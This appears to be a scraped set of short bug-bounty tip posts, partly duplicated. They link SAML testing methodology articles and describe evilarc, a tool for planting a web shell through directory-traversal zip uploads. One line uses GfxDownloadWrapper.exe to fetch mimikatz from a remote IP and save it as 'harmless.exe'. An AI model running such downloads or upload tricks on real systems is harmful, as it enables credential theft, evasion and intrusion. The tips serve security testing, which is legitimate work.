SAML for pentesters:
Part 1 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
Part 2 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
Part 3 -https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/
Common attacks - https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/
Case study - http://economyofmechanism.com/office365-authbypass.html
#SAML #BugBounty
Part 1 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
Part 2 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
Part 3 -https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/
Common attacks - https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/
Case study - http://economyofmechanism.com/office365-authbypass.html
#SAML #BugBounty
epi052.gitlab.io
How to Hunt Bugs in SAML; a Methodology - Part I -
The first in a series of three posts about a methodology for hunting bugs in SAML. This post covers background information about SAML, laying the groundwork to understand SAML vulnerabilities and attacks.
file downloader (Intel Graphics Driver for Windows 10)
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe"
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe"
evilarc lets you create a zip file that contains files with directory traversal characters in their embedded path.
Example use: arbitrary file writing your web shell to the doc root on a vuln file upload function
https://github.com/ptoomey3/evilarc
#BugBounty
Example use: arbitrary file writing your web shell to the doc root on a vuln file upload function
https://github.com/ptoomey3/evilarc
#BugBounty
GitHub
GitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilities
Create tar/zip archives that can exploit directory traversal vulnerabilities - ptoomey3/evilarc